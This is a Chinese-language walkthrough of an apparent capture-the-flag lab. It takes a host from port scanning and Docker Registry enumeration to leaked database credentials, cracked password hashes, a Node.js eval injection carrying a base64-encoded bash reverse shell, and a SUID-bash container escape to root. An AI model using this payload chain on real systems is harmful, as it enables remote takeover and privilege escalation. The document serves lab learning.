端口扫描

nmap --min-rate=10000 -p- umb.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-26 12:01 UTC
Nmap scan report for umb.thm (10.10.227.222)
Host is up (0.0100s latency).
Not shown: 65531 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3306/tcp open mysql
5000/tcp open upnp
8080/tcp open http-proxy
MAC Address: 02:51:6F:5C:2F:11 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 4.12 seconds
nmap -sC -sT -sV -O -p22,3306,5000,8080 umb.thm
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-26 12:02 UTC
Nmap scan report for umb.thm (10.10.227.222)
Host is up (0.00060s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 f0142fd6f6768c589a8e846ab1fbb99f (RSA)
| 256 8a52f1d6ea6d18b26f26ca8987c9496d (ECDSA)
|_ 256 4b0d622a795ca07bc4f46c763c227ff9 (ED25519)
3306/tcp open mysql MySQL 5.7.40
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=MySQL_Server_5.7.40_Auto_Generated_Server_Certificate
| Not valid before: 2022-12-22T10:04:49
|_Not valid after: 2032-12-19T10:04:49
| mysql-info:
| Protocol: 10
| Version: 5.7.40
| Thread ID: 5
| Capabilities flags: 65535
| Some Capabilities: Support41Auth, IgnoreSigpipes, LongPassword, Speaks41ProtocolOld, IgnoreSpaceBeforeParenthesis, InteractiveClient, Speaks41ProtocolNew, ODBCClient, LongColumnFlag, SupportsLoadDataLocal, SupportsTransactions, SwitchToSSLAfterHandshake, SupportsCompression, DontAllowDatabaseTableColumn, FoundRows, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleStatments, SupportsMultipleResults
| Status: Autocommit
| Salt: \x11\x0B\x0F`;o\x19%"hW\x18-p^\x0B\x1A\x02^\x02
|_ Auth Plugin Name: mysql_native_password
5000/tcp open http Docker Registry (API: 2.0)
|_http-title: Site doesn't have a title.
8080/tcp open http Node.js (Express middleware)
|_http-title: Login
MAC Address: 02:51:6F:5C:2F:11 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Linux 3.10 - 3.13 (95%), Linux 3.8 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), ASUS RT-N56U WAP (Linux 3.4) (93%), Linux 3.16 (93%), Linux 2.6.32 (92%), Linux 2.6.39 - 3.2 (92%), Linux 3.1 - 3.2 (92%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 40.55 seconds

Getshell

3306端口对外开放,尝试爆破没有结果

5000端口是一个Docker Registry

根据 https://book.hacktricks.xyz/network-services-pentesting/5000-pentesting-docker-registry

能发现这个本地仓库存有一个镜像

curl -s 'http://umb.thm:5000/v2/umbrella/timetracking/tags/list'
{"name":"umbrella/timetracking","tags":["latest"]}

尝试pull这个镜像但是报错了,也许服务器上配置不允许直接http拉取镜像

docker pull umb.thm:5000/umbrella/timetracking
Using default tag: latest
Error response from daemon: Get "https://umb.thm:5000/v2/": http: server gave HTTP response to HTTPS client

但是之前curl /v2/umbrella/timetracking/manifests/latest的时候发现还可以查看容器的历史记录,在里面发现了数据库信息

DB_USER=root,DB_PASS=Ng1-f3!Pe7-e5?Nf3xe5

远程连接数据库之后在user表中得四个用户

mysql -h umb.thm -u root -p
MySQL [timetracking]> select * from users;
+----------+----------------------------------+-------+
| user | pass | time |
+----------+----------------------------------+-------+
| claire-r | 2ac9cb7dc02b3c0083eb70898e549b63 | 360 |
| chris-r | 0d107d09f5bbe40cade3de5c71e9e9b7 | 420 |
| jill-v | d5c0607301ad5d5c1528962a83992ac8 | 564 |
| barry-b | 4a04890400b5d7bac101baace5d7e994 | 47893 |
+----------+----------------------------------+-------+
4 rows in set (0.266 sec)

在线md5解密

claire-r | Password1

chris-r | letmein

jill-v | sunshine1

barry-b | sandwich

虽然8080端口有一个nodejs登陆界面,但是先尝试ssh登录

发现claire-r用户竟然可以直接登录,也是有点抽象…

docker逃逸

查看ip,我们不在docker容器中,也就不用做逃逸了

本来想尝试mysql本地提权的,但是利用条件不够,现在思路是转移到user用户,感觉8080端口可以利用

查看dockercompose文件,挂载了一个log目录作为/logs目录,可以合理怀疑这个8080nodejs是user用户开的,如果能够做一个反弹shell,拿到的身份就是user用户了

还是用claire-r用户身份凭证登录8080的nodejs

可以增加下面的time?能够查看app.js的源码,不太懂nodejs,让gpt分析一下源码

当我们提交表单的时候是向/time路由请求一个time参数的请求,并且通过eval函数可以计算,eval函数还有命令执行的功能

开启监听,做一个命令执行来反弹shell

require('child_process').execSync('echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMS43Ny4yOC8xMjM0IDA+JjE= | base64 -d | bash').toString();

但是拿到的是容器的root权限,但是来到之前挂载的/logs,也就是说容器中的/logs目录是与物理机中的log目录是相通的

在容器中:

cp /bin/bash /log/root_bash

chmod +xs /log/root_bash

在物理机中

./root_bash -p

现在我们是ROOT!

碎碎念

了解了5000端口开设的Docker Registry服务,然后之后的内容无论是nodejsRCE还是容器逃逸的方法都是接触过挺多遍的了,实际上不需要拿到user用户身份